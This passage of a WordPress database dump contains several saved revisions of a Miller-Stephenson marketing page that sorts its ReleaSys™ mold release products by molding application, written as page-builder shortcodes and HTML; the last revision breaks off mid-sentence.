INSERT INTO `wp_posts` VALUES (4502, 2, '2017-06-08 12:28:45', '2017-06-08 12:28:45', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center" width="500px"]\n\n[button text="ADVANCED COMPOSITES" target="href=#"]\n\n[button text="ROTATIONAL PLASTIC"]\n\n[button text="POLYURETHANE"]\n\n[button text="RUBBER-SILICONE-ELASTOMER"]\n\n[button text="INJECTION PLASTICS"]\n\n[button text="FIBERGLASS"]\n\n[button text="PRECAST /  REINFORCED CONCRETE"]\n\n[button text="CUSTOM FORMULATIONS"]\n\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinforced Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n\n[/section]\n[scroll_to title="advanced composites"]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-08 12:28:45', '2017-06-08 12:28:45', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4503, 2, '2017-06-08 12:32:43', '2017-06-08 12:32:43', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center" width="500px"]\n\n[button text="ADVANCED COMPOSITES" target="href=#"]\n\n[button text="ROTATIONAL PLASTIC"]\n\n[button text="POLYURETHANE"]\n\n[button text="RUBBER-SILICONE-ELASTOMER"]\n\n[button text="INJECTION PLASTICS"]\n\n[button text="FIBERGLASS"]\n\n[button text="PRECAST /  REINFORCED CONCRETE"]\n\n[button text="CUSTOM FORMULATIONS"]\n\n[divider align="center" width="500px"]\n\n[scroll_to title="ADVANCED COMPOSITES"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[scroll_to title="ROTATIONAL PLASTICS"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[scroll_to title="POLYURETHANE - TPU"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[scroll_to title="RUBBER - SILICONE- ELASTOMERS"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[scroll_to title="INJECTION MOLDING PLASTICS"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[scroll_to title="FIBERGLASS MOLD RELEASE"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[scroll_to title="PRE-CAST / REINFORCED CONCRETE"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinforced Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[scroll_to title="CUSTOM FORMULATIONS"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-08 12:32:43', '2017-06-08 12:32:43', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4504, 2, '2017-06-08 12:36:36', '2017-06-08 12:36:36', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center" width="500px"]\n\n[button text="ADVANCED COMPOSITES" target="href=#"]\n\n[button text="ROTATIONAL PLASTIC"]\n\n[button text="POLYURETHANE"]\n\n[button text="RUBBER-SILICONE-ELASTOMER"]\n\n[button text="INJECTION PLASTICS"]\n\n[button text="FIBERGLASS"]\n\n[button text="PRECAST /  REINFORCED CONCRETE"]\n\n[button text="CUSTOM FORMULATIONS"]\n\n[divider align="center" width="500px"]\n\n[scroll_to title="ADVANCED COMPOSITES"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[scroll_to title="ROTATIONAL PLASTICS"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinforced Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-08 12:36:36', '2017-06-08 12:36:36', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4505, 2, '2017-06-08 12:36:58', '2017-06-08 12:36:58', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center" width="500px"]\n\n[button text="ADVANCED COMPOSITES" target="href=#"]\n\n[button text="ROTATIONAL PLASTIC"]\n\n[button text="POLYURETHANE"]\n\n[button text="RUBBER-SILICONE-ELASTOMER"]\n\n[button text="INJECTION PLASTICS"]\n\n[button text="FIBERGLASS"]\n\n[button text="PRECAST /  REINFORCED CONCRETE"]\n\n[button text="CUSTOM FORMULATIONS"]\n\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your 